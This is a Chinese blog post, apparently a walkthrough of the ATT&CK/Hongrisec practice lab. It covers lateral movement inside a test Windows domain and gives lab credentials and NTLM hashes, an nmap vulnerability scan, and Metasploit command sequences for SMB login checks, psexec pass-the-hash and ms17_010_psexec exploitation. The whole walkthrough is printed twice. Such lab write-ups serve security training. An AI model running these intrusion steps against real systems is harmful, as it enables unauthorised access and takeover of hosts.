1. 程式人生 > 其它 >內網橫向滲透 之 ATT&CK系列一 之 橫向滲透域主機

內網橫向滲透 之 ATT&CK系列一 之 橫向滲透域主機

前言

上一篇文章中已獲取了關於域的一些基本資訊,在這裡再整理一下,不知道資訊收集的小夥伴可以看回上一篇文章哦

域:god.org

域控 windows server 2008:OWA,192.168.52.138

域主機 windows server 2003:ROOT-TVI862UBEH,192.168.52.141

win7內網ip:192.168.52.143

win7 username : Administrator domain : GOD password : hongrisec@2022(因為登陸域控機win2008的時候會要求改密碼,我這個改成hongrisec@2022)

LM:edea194d76c77d87923b4276177762ae;NTLM:8c535a2d84c3b21059d667639bb89db5

 


 

橫向滲透

通過win7的nmap對域成員進行漏洞埠掃描,使用 where nmap 可以得到nmap的安裝路徑

nmap.exe --script=vuln 192.168.52.141

存在ms08-067(CVE-2008-4250)、ms17-010(CVE-2017-0143)

使用 scanner/smb/smb_login 驗證SMB登入

use scanner/smb/smb_login
set RHOSTS 192.168.52.141
set SMBPass hongrisec@2022
set SMBUSER Administrator
set SMBDomain GOD
run

說明win7的賬號密碼對域成員也有效

至此,域成員存在漏洞,且知道使用者名稱、密碼、域,使用漏洞進行滲透獲取域內使用許可權

因為是內網windows系統,這裡我選擇用雜湊傳遞攻擊,使用的模組是 exploit/windows/smb/psexec

 

use exploit/windows/smb/psexec
set payload windows/shell/bind_tcp set RHOSTS
192.168.52.141 set SMBDomain god set SMBUser Administrator set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5    # 這裡是用雜湊密碼傳遞,冒號前面的是LM雜湊值,冒號後面的是NTLM雜湊值
run

 

檢視許可權 whoami

可以看到,是管理員的最高許可權,這裡就不需要提權了,至此,域主機已被攻破!


 

彩蛋

域主機 windows server 2003 存在ms17-010漏洞,可以通過ms17-010漏洞進行攻擊

注:msfconsole中的ms17_010_eternalblue模組僅支援x64,而咱們的目標域主機是x86的,所以這裡不適用

使用模組 ms17_010_psexec 進行攻擊,這裡選擇這個模組的原因:在域內,且存在ms17-010漏洞

use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.52.141
set SMBDomain GOD
set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5
set SMBUser Administrator
run

域主機藍屏

msfconsole報錯

 

 至此攻擊成功,沒有反彈shell,因為目標域主機已藍屏!

 

 

 

 

 

TRANSLATE with x English
Arabic Hebrew Polish
Bulgarian Hindi Portuguese
Catalan Hmong Daw Romanian
Chinese Simplified Hungarian Russian
Chinese Traditional Indonesian Slovak
Czech Italian Slovenian
Danish Japanese Spanish
Dutch Klingon Swedish
English Korean Thai
Estonian Latvian Turkish
Finnish Lithuanian Ukrainian
French Malay Urdu
German Maltese Vietnamese
Greek Norwegian Welsh
Haitian Creole Persian  
  TRANSLATE with COPY THE URL BELOW Back EMBED THE SNIPPET BELOW IN YOUR SITE Enable collaborative features and customize widget: Bing Webmaster Portal Back

前言

上一篇文章中已獲取了關於域的一些基本資訊,在這裡再整理一下,不知道資訊收集的小夥伴可以看回上一篇文章哦

域:god.org

域控 windows server 2008:OWA,192.168.52.138

域主機 windows server 2003:ROOT-TVI862UBEH,192.168.52.141

win7內網ip:192.168.52.143

win7 username : Administrator domain : GOD password : hongrisec@2022(因為登陸域控機win2008的時候會要求改密碼,我這個改成hongrisec@2022)

LM:edea194d76c77d87923b4276177762ae;NTLM:8c535a2d84c3b21059d667639bb89db5

 


 

橫向滲透

通過win7的nmap對域成員進行漏洞埠掃描,使用 where nmap 可以得到nmap的安裝路徑

nmap.exe --script=vuln 192.168.52.141

存在ms08-067(CVE-2008-4250)、ms17-010(CVE-2017-0143)

使用 scanner/smb/smb_login 驗證SMB登入

use scanner/smb/smb_login
set RHOSTS 192.168.52.141
set SMBPass hongrisec@2022
set SMBUSER Administrator
set SMBDomain GOD
run

說明win7的賬號密碼對域成員也有效

至此,域成員存在漏洞,且知道使用者名稱、密碼、域,使用漏洞進行滲透獲取域內使用許可權

因為是內網windows系統,這裡我選擇用雜湊傳遞攻擊,使用的模組是 exploit/windows/smb/psexec

 

use exploit/windows/smb/psexec
set payload windows/shell/bind_tcp set RHOSTS
192.168.52.141 set SMBDomain god set SMBUser Administrator set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5    # 這裡是用雜湊密碼傳遞,冒號前面的是LM雜湊值,冒號後面的是NTLM雜湊值 run

 

檢視許可權 whoami

可以看到,是管理員的最高許可權,這裡就不需要提權了,至此,域主機已被攻破!


 

彩蛋

域主機 windows server 2003 存在ms17-010漏洞,可以通過ms17-010漏洞進行攻擊

注:msfconsole中的ms17_010_eternalblue模組僅支援x64,而咱們的目標域主機是x86的,所以這裡不適用

使用模組 ms17_010_psexec 進行攻擊,這裡選擇這個模組的原因:在域內,且存在ms17-010漏洞

use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.52.141
set SMBDomain GOD
set SMBPass edea194d76c77d87923b4276177762ae:8c535a2d84c3b21059d667639bb89db5
set SMBUser Administrator
run

域主機藍屏

msfconsole報錯

 

 至此攻擊成功,沒有反彈shell,因為目標域主機已藍屏!